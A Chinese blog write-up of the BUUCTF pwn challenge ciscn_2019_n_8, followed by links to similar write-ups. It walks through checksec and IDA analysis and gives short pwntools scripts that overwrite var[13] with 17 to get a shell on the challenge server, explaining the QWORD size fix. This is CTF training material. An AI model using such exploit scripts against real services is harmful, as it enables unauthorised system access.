[BUUCTF-pwn]——ciscn_2019_n_8

最新推荐文章于 2024-09-03 19:55:03 发布
原创 最新推荐文章于 2024-09-03 19:55:03 发布 · 3k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了如何解决一个CTF中的缓冲区溢出问题,涉及到了64位环境下地址的正确表示。在原始exploit中,由于对QWORD的理解错误,导致尝试失败。通过修正,使用p64()或两个p32()来正确填充8字节的地址,最终成功交互。该过程展示了对内存管理和指针理解的重要性。

[BUUCTF-pwn]——ciscn_2019_n_8

  • 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8
  • 题目
    在这里插入图片描述
    上去checksec一下,吓一跳保护基本全开了。在这里插入图片描述
    在IDA中一看,开心了。如此简单 只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下:

在这里插入图片描述

exploit

from pwn import *
p = remote("node3.buuoj.cn",29772)
p.sendline("aaaa"*13 + p32(0x11))
p.interactive()

发现不可以, 点不开 _QWORD 就去百度了一下
qword全称是Quad Word。2个字节就是1个Word(1个字,16位),q就是英文quad-这个词根(意思是4)的首字母,所以它自然是word(2字节,0~2^16-1)的四倍,8字节
所以expoit改下应该为

from pwn import *
p = remote("node3.buuoj.cn",29772)
p.sendline("aaaa"*13 + p64(0x11)) # 32对应4个字节, 64对应8个字节
p.interactive()

或者

from pwn import *
p = remote("node3.buuoj.cn",29772)
p.sendline("aaaa"*13 + p32(0x11) + p32(0)) # 32对应4个字节, 64对应8个字节
p.interactive()
buuctf pwn ciscn_2019_n_8
zip471642048的博客
06-21 429
checksec 看一下基本信息 把程序拖到ida32分析一波,可以看到 读入字符串给了 var 然后后面的v4,v5没起作用,然后判断了var[13]是不是等于\x11,是就给一个shell 所以只要让我们输入的字符后13位等于...
BUUCTF - PWNciscn_2019_n_8
古月浪子的博客
03-27 1250
checksec一下,好叭全开 IDA打开看看,var是int数组,如果var[13]=0x11的话就能get flag from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sla=lambda x,y:io.sendlin...
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 722
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
BUUCTF-PWN-ciscn_2019_n_8
Henlenl的博客
05-18 312
文章目录查看文件信息IDA 分析exp 查看文件信息 checksec 一下,保护还开的挺满 canary(栈保护),nx(堆栈不可执行),PIE(地址随机化) IDA 分析 其实我们应该nc 连一下的查看远程程序运行情况 丢入 32位IDA分析一下 很显然 程序的意思就是让 var[13] == 17就能拿到shell了 exp from pwn import * r = remote('node3.buuoj.cn',27168) #r = process('./ciscn_2019_n_8')
Buuctf(pwn)ciscn_2019_n_8
半岛铁盒的博客
03-28 304
保护开的挺全; from pwn import* r=remote('node3.buuoj.cn',28155) payload = p32(17)*14 r.sendline(payload) r.interactive() 没利用漏洞,简单的输入满足条件就好了
BUUCTF ciscn_2019_n_8
红叶的博客
10-31 373
一道通过Checksec让没看源代码的你觉得难度很高的题。
BUUCTF-PWN】4-ciscn_2019_n_1
燕麦葡萄干的博客
07-04 706
这里为了堆栈平衡+1反而没办法打通,不+1反而可以成功,因此后面做题的时候加不加1都试一下。需要v1变量溢出到v2,然后给v2 11.28125的值。查看变量在栈中的位置:v1 0x30 v2 0x04。11.28125的十六进制值是0x41348000。checksec检查是64位,开启了NX保护。这里再试验第二种思路,溢出到变量2。后门函数的地址是0x4006BE。
BUUCTF pwn——ciscn_2019_n_1
CNS-Enterprise BCC-1701-J
03-11 421
BUUCTF 做题练习
BUUCTF-PWN】9-ciscn_2019_n_8
燕麦葡萄干的博客
07-05 462
4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节。不属于栈溢出,应该是比较简单的pwn,看懂代码逻辑+使用pwntools。32位,开启了Stack、NX、PIE保护。即当var数组的第十四个元素是17就可以。
[BUUCTF-pwn]——ciscn_2019_n_5
Y_peak的博客
02-11 919
[BUUCTF-pwn]——ciscn_2019_n_5 题目地址: https://buuoj.cn/challenges#ciscn_2019_n_5 老规矩还是先checksec 一下看看,64位的什么保护都没开.感觉应该要自己写shellcode了 在IDA中一看,果然如此.将准备好的shellcode 通过read写入 name . 然后通过gets进行栈溢出,使其,返回至name所在位置即可. shellcraft是pwntools中的一个模块是shellcode的生成器 所以shell
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 8756
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
[buuctf]ciscn_2019_n_8
逆向萌新的博客
06-19 580
[buuctf]ciscn_2019_n_8
BUUCTF-Pwn-ciscn_2019_n_8
餐桌上的猫
02-15 344
题目截图 检查文件信息,开了NX,Canary和PIE 反汇编查看主函数,只要var[13]=17就可以getshell,值得注意的是使用了(_QWORD *)进行类型转换,所以比较时读取的是QWORD即4个字的数据,也就是8个字节 exp from pwn import* r=remote('node4.buuoj.cn',28850) payload=p32(1)*13+p64(17) r.sendlineafter(b'\n', payload) r.interactive() #开启交互
[BUUCTF] ciscn_2019_n_8
Lucien_Carr的博客
04-14 626
这道题非常简单(甚至比ret2text简单...),只需要满足让系统调用system函数的条件,即将var[13]这个数组里全部填上17即可。checksec --file='filename' # filename为下载文件的自定义名称。观察选择条件,只需要满足var[13] = 17就可以。前面有scanf函数,可以直接向var数组输入。开了canary、NX和PIE,似乎防得很严实。主函数里就调用了system函数,运气很好。32位程序,放到IDA中继续分析。攻击成功,运行结果如下。
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2760
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
BUUCTF PWN wp--ciscn_2019_n_8
最新发布
2302_81740139的博客
09-03 968
第二步 进入主函数,发现关键字眼/bin/sh,我们分析一下含bin的这部分代码。由于这里是var[13]=17LL,而var数组可以覆盖到了var[15]如图。为什么乘以14,因为,数组13是第14位(下表为零开始)第一步 checksec一下,本题为32位。
buuctf ciscn_2019_n_8
carol2358的博客
04-15 336
ida: 直接有sh,只要让var[13]等于17就可以 exp: from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvl...
buuctfciscn_2019_n_8
weixin_54452942的博客
04-12 868
两个方法解题
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值